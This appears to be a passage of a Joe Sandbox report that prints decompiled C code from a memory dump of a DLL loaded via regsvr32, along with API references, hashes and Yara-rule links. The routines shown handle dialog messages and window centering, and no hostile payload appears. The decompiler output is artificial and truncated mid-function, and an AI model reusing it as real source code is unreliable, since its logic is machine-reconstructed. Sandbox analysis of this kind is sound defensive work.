																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E6DA43FED(_t232);
																	} else {
																		_t172 = E6DA43F96(_t232);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E6DA43AEE(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E6DA54FCE(_a4, _v24, _v44);
																			} else {
																				_t174 = E6DA405F2(_t229, _t232, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E6DA55011(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E6DA439AE(_t188 < 0, _t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E6DA47789(_t255, _v36, _t229);
																			} else {
																				_t191 = E6DA405F2(_t229, _t232, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E6DA55011(_t244);
																				E6DA551D5(_t229, _t232, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t236 =  *_t195;
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E6DA54FA6(_t229, _t236, _v24);
																		_pop(_t232);
																		__eflags = _t182 & 0x00000010;
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E6DA55361(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E6DA43620(_t251);
																		}
																		_t243 = 0;
																		_v40 = _t183;
																		__eflags = _t251;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E6DA436A2(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E6DA43705();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E6DA55254(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E6DA54EFA(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E6DA5561F(_t229, _t232, _t236, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E6DA4F401(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													_t203 = _t198 - 4;
													__eflags = _t203;
													if(_t203 != 0) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															_v28 = _t165;
															__eflags = _t165;
															if(_t165 != 0) {
																_t167 = E6DA405F2(_t229, _t232, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E6DA55162(_t232, E6DA405F2(_t229, _t232, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E6DA551D5(_t229, _t232, _v24, E6DA405F2(_t229, _t232, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E6DA55396(_t236, _a4, _v24, E6DA405F2(_t229, _t234, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24 - _t203;
														if(_v24 != _t203) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E6DA405F2(_t229, _t232, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E6DA405F2(_t229, _t232, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E6DA5C8E5(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E6DA439AE(0, _a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

0x6da5561f
0x6da5561f
0x6da55624
0x6da55625
0x6da55629
0x6da5562a
0x6da5562b
0x6da55632
0x6da55637
0x6da5563b
0x6da5563d
0x6da55645
0x6da55649
0x6da5564b
0x6da5564e
0x6da55653
0x6da55655
0x6da55659
0x6da55659
0x6da55661
0x6da55663
0x6da55668
0x00000000
0x00000000
0x6da55672
0x6da55682
0x00000000
0x00000000
0x6da55684
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55672
0x6da55686
0x6da55686
0x6da55653
0x6da55649
0x6da55688
0x6da55688
0x6da5568a
0x6da55696
0x6da5569c
0x00000000
0x00000000
0x6da5569f
0x6da556a4
0x6da556a7
0x6da556b9
0x6da556bb
0x6da556de
0x6da556de
0x6da556e1
0x6da55711
0x6da55716
0x6da55717
0x6da5571e
0x6da55723
0x6da55726
0x6da55728
0x6da55732
0x6da5572a
0x6da5572a
0x6da5572a
0x6da55735
0x6da55738
0x6da5573b
0x6da55745
0x6da55748
0x6da5574d
0x6da55752
0x6da55755
0x6da55757
0x6da55761
0x6da55767
0x6da5576a
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55759
0x6da55759
0x6da5575f
0x6da55770
0x6da55770
0x6da55772
0x6da5581f
0x6da55821
0x6da55823
0x6da55826
0x6da5582b
0x6da5582e
0x6da55834
0x6da55834
0x6da55836
0x6da5583d
0x6da558c7
0x6da558cc
0x6da558d0
0x6da558d3
0x6da55a11
0x6da55a14
0x00000000
0x6da55a1a
0x6da55a1a
0x6da55a1d
0x6da55ad1
0x00000000
0x6da55a23
0x6da55a23
0x6da55a26
0x6da55ad8
0x6da55adc
0x6da55ae1
0x6da55ae3
0x00000000
0x6da55ae9
0x6da55ae9
0x6da55aed
0x6da55af0
0x6da55af2
0x6da55afb
0x6da55af4
0x6da55af4
0x6da55af4
0x6da55b00
0x6da55b02
0x6da55b04
0x00000000
0x6da55b0a
0x6da55b0a
0x6da55b0e
0x6da55b10
0x6da55b14
0x6da55b14
0x6da55b19
0x6da55b1d
0x6da55b2d
0x6da55b2f
0x6da55b31
0x6da55b3e
0x6da55b44
0x6da55b33
0x6da55b34
0x6da55b34
0x6da55b49
0x6da55b4b
0x6da55b4d
0x00000000
0x6da55b53
0x6da55b59
0x6da55b5c
0x6da55b5f
0x6da55b64
0x6da55b67
0x6da55b74
0x6da55b74
0x00000000
0x6da55b67
0x6da55b1f
0x6da55b1f
0x6da55b25
0x00000000
0x6da55b25
0x6da55b1d
0x6da55b04
0x6da55a2c
0x6da55a2c
0x6da55a2f
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55a2f
0x6da55a26
0x6da55a1d
0x00000000
0x6da558d9
0x6da558d9
0x6da55a69
0x6da55a69
0x6da55a69
0x00000000
0x6da558df
0x6da558df
0x6da558e2
0x00000000
0x6da558e8
0x6da558e8
0x6da558eb
0x6da5598b
0x6da5598d
0x00000000
0x6da55993
0x6da55995
0x6da5599b
0x6da559a0
0x6da559a3
0x6da559a6
0x6da559ab
0x6da559b0
0x6da559b2
0x00000000
0x6da559b8
0x6da559b8
0x6da559bc
0x6da559d1
0x6da559d3
0x6da559d5
0x6da559e3
0x6da559e5
0x6da559d7
0x6da559d8
0x6da559d8
0x6da559ea
0x6da559ec
0x6da559ee
0x6da559f7
0x6da559fc
0x6da55a05
0x6da55a0b
0x6da55a0b
0x6da559be
0x6da559be
0x6da559c1
0x6da559c4
0x6da559c6
0x6da559c6
0x00000000
0x6da559bc
0x6da559b2
0x00000000
0x6da558f1
0x6da558f1
0x6da558f4
0x6da55a35
0x6da55a35
0x6da55a37
0x00000000
0x6da55a3d
0x6da55a40
0x6da55a45
0x6da55a46
0x6da55a48
0x6da55a59
0x6da55a4a
0x6da55a4a
0x6da55a4d
0x6da55a4f
0x6da55a4f
0x6da55a5e
0x6da55a60
0x6da55a63
0x6da55a65
0x6da55a80
0x6da55a80
0x6da55a82
0x6da55a87
0x6da55a89
0x6da55a97
0x6da55a9a
0x00000000
0x6da55aa0
0x6da55aa0
0x6da55aa1
0x6da55aa2
0x6da55aa3
0x6da55aa5
0x6da55aaa
0x6da55aab
0x6da55aae
0x6da55ab6
0x00000000
0x6da55ab6
0x6da55a8b
0x6da55a8c
0x00000000
0x6da55a8c
0x6da55a67
0x6da55a6b
0x6da55a76
0x6da55a78
0x6da55a7a
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55a7a
0x6da55a65
0x00000000
0x00000000
0x00000000
0x00000000
0x6da558f4
0x6da558eb
0x6da558e2
0x6da558d9
0x00000000
0x6da55843
0x6da55844
0x6da55844
0x6da55845
0x6da55871
0x6da55875
0x6da5587a
0x6da55881
0x6da55887
0x6da55887
0x6da5588b
0x6da5588f
0x6da55895
0x6da55895
0x6da55899
0x00000000
0x6da5589f
0x6da5589f
0x6da558a6
0x6da558ab
0x6da558ad
0x00000000
0x6da558af
0x6da558af
0x6da558b2
0x6da558b4
0x00000000
0x6da558b6
0x6da558b7
0x6da558b9
0x6da55b7a
0x6da55b7a
0x6da55b7a
0x6da558b4
0x00000000
0x6da558ad
0x6da55891
0x6da55891
0x6da55893
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55893
0x6da55883
0x6da55883
0x6da55885
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55885
0x6da55847
0x6da55847
0x6da55847
0x6da5584a
0x6da558fa
0x6da558fa
0x6da558fd
0x6da55904
0x6da5590c
0x6da55912
0x6da55915
0x6da55917
0x6da55922
0x6da55927
0x6da5592a
0x6da55935
0x6da5593a
0x6da5593a
0x6da5592a
0x6da55917
0x6da5593b
0x6da55944
0x6da55946
0x6da55948
0x6da5595c
0x6da55962
0x6da55966
0x6da55968
0x6da5596a
0x6da5597b
0x6da5597b
0x6da5596a
0x6da55980
0x6da55850
0x6da55850
0x6da55853
0x6da55866
0x6da55866
0x6da5586b
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55855
0x6da55857
0x6da5585d
0x6da55860
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55860
0x6da55853
0x6da5584a
0x6da55845
0x6da55778
0x6da5577e
0x6da55780
0x6da55780
0x6da55784
0x00000000
0x00000000
0x6da5578c
0x6da55791
0x6da55794
0x6da557a1
0x6da557a3
0x6da557a5
0x00000000
0x00000000
0x6da557a5
0x00000000
0x6da55794
0x6da557a7
0x6da557a9
0x6da557ce
0x6da557ce
0x6da557d5
0x6da557e5
0x6da557e5
0x6da557e7
0x00000000
0x6da557e9
0x6da557e9
0x6da557ec
0x6da557ee
0x00000000
0x6da557f0
0x6da557f3
0x6da557f7
0x6da557fb
0x6da55806
0x6da55806
0x6da5580a
0x00000000
0x6da5580c
0x6da5580c
0x6da55813
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55813
0x6da557fd
0x6da557fd
0x6da55804
0x6da55815
0x6da55815
0x00000000
0x00000000
0x00000000
0x6da55804
0x6da557fb
0x6da557ee
0x6da557d7
0x6da557d7
0x6da557da
0x00000000
0x6da557dc
0x6da557dc
0x6da557e3
0x6da5581c
0x6da5581c
0x00000000
0x00000000
0x00000000
0x00000000
0x6da557e3
0x6da557da
0x6da557ab
0x6da557ab
0x6da557ae
0x6da557b0
0x00000000
0x6da557b2
0x6da557b2
0x6da557b6
0x00000000
0x6da557b8
0x6da557b8
0x6da557be
0x6da557c1
0x6da557c4
0x6da557c6
0x00000000
0x6da557c8
0x6da557c8
0x6da557c8
0x6da557c6
0x6da557b6
0x6da557b0
0x6da557a9
0x00000000
0x00000000
0x00000000
0x6da5575f
0x6da55988
0x6da556e3
0x6da556e3
0x6da556e8
0x6da556eb
0x6da556f0
0x00000000
0x00000000
0x00000000
0x00000000
0x6da556f0
0x6da556bd
0x6da556bd
0x6da556c2
0x6da556c9
0x6da556c4
0x6da556c4
0x6da556c4
0x6da556cd
0x00000000
0x6da556cf
0x6da556d8
0x6da556f2
0x6da556f2
0x6da556f5
0x00000000
0x6da556f7
0x6da556f7
0x6da556fa
0x6da556fc
0x6da556fc
0x6da556ff
0x6da55700
0x6da55706
0x00000000
0x00000000
0x00000000
0x00000000
0x6da55706
0x6da556da
0x6da556da
0x6da556da
0x6da5570a
0x6da5570e
0x6da5570e
0x6da556d8
0x6da556cd
0x6da556a9
0x6da556a9
0x6da556b3
0x6da556b7
0x00000000
0x00000000
0x00000000
0x00000000
0x6da556b7
0x00000000
0x6da556a7
0x6da55708
0x6da55708
0x00000000

APIs

GetFocus.USER32 ref: 6DA55674
IsWindowEnabled.USER32(?), ref: 6DA556D0
__EH_prolog3_catch.LIBCMT ref: 6DA5571E
GetFocus.USER32 ref: 6DA5573E
GetParent.USER32(?), ref: 6DA55789
GetParent.USER32(?), ref: 6DA55799
GetKeyState.USER32(00000012), ref: 6DA55857
IsDialogMessageA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6DA5590C
GetFocus.USER32 ref: 6DA5591F
GetFocus.USER32 ref: 6DA5592C
IsWindow.USER32(?), ref: 6DA55944
GetFocus.USER32 ref: 6DA55950
IsWindow.USER32(?), ref: 6DA55966
GetFocus.USER32 ref: 6DA5596C
GetKeyState.USER32(00000010), ref: 6DA55995
MessageBeep.USER32 ref: 6DA55A8C

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
String ID:
API String ID: 656273425-0
Opcode ID: accbdabe8479eec2a3a9df30202bbd366a9e39fa5ac7620b9c8e48f21282fd74
Instruction ID: 794175dc31fe339d43e4710ff1e0a17782c410f5e6f78a41e614c7c9fdf751d6
Opcode Fuzzy Hash: accbdabe8479eec2a3a9df30202bbd366a9e39fa5ac7620b9c8e48f21282fd74
Instruction Fuzzy Hash: 04F10D3990C207EFDF109FA5C984BBE7BB1AF45314F1A8468E911AB560DB34D8E1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3FFBB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E6DA3FFBB(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E6DA43579(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E6DA3DFE3(_t121, E6DA3DF76(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E6DA3F1B8();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E6DA3DFE3(_t121, E6DA3DF76(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t123 + _t116 > _v28.right) {
					_t116 = _t108 - _v60.right + _v28.right;
				}
				if(_t116 < _v28.left) {
					_t116 = _v28.left;
				}
				if(_a4 + _t129 > _v28.bottom) {
					_t129 = _v60.top - _v60.bottom + _v28.bottom;
				}
				if(_t129 < _v28.top) {
					_t129 = _v28.top;
				}
				return E6DA4390A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

0x6da3ffbb
0x6da3ffbb
0x6da3ffc4
0x6da3ffc7
0x6da3ffcf
0x6da3ffd2
0x6da3ffd7
0x6da3ffe5
0x6da3fff7
0x6da3ffe7
0x6da3ffea
0x6da3ffea
0x6da3fffd
0x6da40001
0x6da4000d
0x6da40015
0x6da40017
0x6da40017
0x6da40015
0x6da3ffd9
0x6da3ffd9
0x6da3ffd9
0x6da3ffd9
0x6da40019
0x6da40027
0x6da40030
0x6da400d0
0x6da400d7
0x6da400de
0x6da400e8
0x6da40036
0x6da40038
0x6da4003d
0x6da40048
0x6da40051
0x6da40051
0x6da40048
0x6da40053
0x6da4005c
0x6da4009d
0x6da400ac
0x6da400b9
0x6da4005e
0x6da4005e
0x6da40065
0x6da40067
0x6da40067
0x6da40077
0x6da4008a
0x6da40094
0x6da40094
0x6da4005c
0x6da400f7
0x6da400fc
0x6da40101
0x6da40105
0x6da40108
0x6da4010f
0x6da40119
0x6da40121
0x6da40129
0x6da40130
0x6da40135
0x6da4013d
0x6da4013d
0x6da40143
0x6da40145
0x6da40145
0x6da40150
0x6da40158
0x6da40158
0x6da4015e
0x6da40160
0x6da40160
0x6da40178

APIs

Part of subcall function 6DA43579: GetWindowLongA.USER32(CCCCCCCC,000000F0), ref: 6DA43584

GetParent.USER32(?), ref: 6DA3FFEA
SendMessageA.USER32 ref: 6DA4000D
GetWindowRect.USER32 ref: 6DA40027
GetWindowLongA.USER32(00000000,000000F0), ref: 6DA4003D
CopyRect.USER32(?,?), ref: 6DA4008A
CopyRect.USER32(?,?), ref: 6DA40094
GetWindowRect.USER32 ref: 6DA4009D
CopyRect.USER32(?,?), ref: 6DA400B9

Strings

(, xrefs: 6DA40053

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 3af389036c50e68ab6d46807b50d3ca7e2f059e02e1932acf8983a28a3574e4f
Instruction ID: 888e2e09cd04f3d7a5bb27e3e763e7f298779213e9a1fc74508c5de0285e9044
Opcode Fuzzy Hash: 3af389036c50e68ab6d46807b50d3ca7e2f059e02e1932acf8983a28a3574e4f
Instruction Fuzzy Hash: 50516276A08219ABDB00CBA9CD84FEEBBB9BF89314F158115E915F3180DB30E985DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DA57DB5 Relevance: 24.5, APIs: 16, Instructions: 460
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E6DA57DB5(void* __ebx, signed short* __ecx, void* __edi, void* __esi) {
				signed int* _t193;
				void* _t197;
				signed int _t210;
				signed int _t214;
				void* _t216;
				intOrPtr _t219;
				signed short _t220;
				signed short _t222;
				signed short _t224;
				void* _t238;
				CHAR* _t244;
				signed short _t245;
				signed short _t246;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t258;
				signed short _t261;
				void* _t265;
				signed short _t268;
				signed short _t269;
				signed short* _t272;
				signed int _t290;
				signed short* _t291;
				signed int _t306;
				signed int _t311;
				void* _t313;
				intOrPtr* _t314;
				signed short* _t316;
				signed short _t318;
				intOrPtr* _t319;
				intOrPtr _t320;
				signed short* _t321;
				void* _t322;
				void* _t323;
				void* _t324;

				_t267 = __ebx;
				_push(__esi);
				_push(__edi);
				_t316 = __ecx;
				_t311 = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L6:
					return _t193;
				} else {
					_push(__ebx);
					while(1) {
						_t272 = _t316;
						if( *((intOrPtr*)(E6DA56F0B(_t272, _t311))) == 0) {
							break;
						}
						_t272 = _t316;
						if( *((intOrPtr*)(E6DA56F0B(_t272, _t311) + 4)) == 0) {
							break;
						} else {
							_t265 = E6DA56F0B(_t316, _t311);
							_t267 = _t265;
							_t193 =  *(E6DA56F0B(_t316, _t311));
							_t311 = _t311 + 1;
							 *_t193 = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t265 + 4)))) != 0x00000000;
							if(_t311 < _t316[4]) {
								continue;
							} else {
								goto L6;
							}
						}
						goto L86;
					}
					E6DA44898(_t272);
					asm("int3");
					_push(0x7c);
					_t197 = E6DA5C80D(E6DA6F149, _t267, _t311, _t316);
					 *(_t322 - 0x24) = _t272;
					_t268 = 0;
					__eflags =  *_t272;
					if( *_t272 != 0) {
						 *((intOrPtr*)(_t322 - 0x54)) = 0;
						 *((intOrPtr*)(_t322 - 0x50)) = 0;
						 *(_t322 - 0x4c) = 0;
						 *((intOrPtr*)(_t322 - 0x48)) = 0;
						 *(_t322 - 4) = 0;
						E6DA5C5A0(_t311, _t322 - 0x54, 0, 0x10);
						_t324 = _t323 + 0xc;
						__eflags =  *(_t322 + 0x18);
						if( *(_t322 + 0x18) != 0) {
							 *(_t322 - 0x4c) = lstrlenA( *(_t322 + 0x18));
						}
						__eflags =  *(_t322 + 0xc) & 0x0000000c;
						 *((intOrPtr*)(_t322 - 0x20)) = 0xfffffffd;
						if(( *(_t322 + 0xc) & 0x0000000c) != 0) {
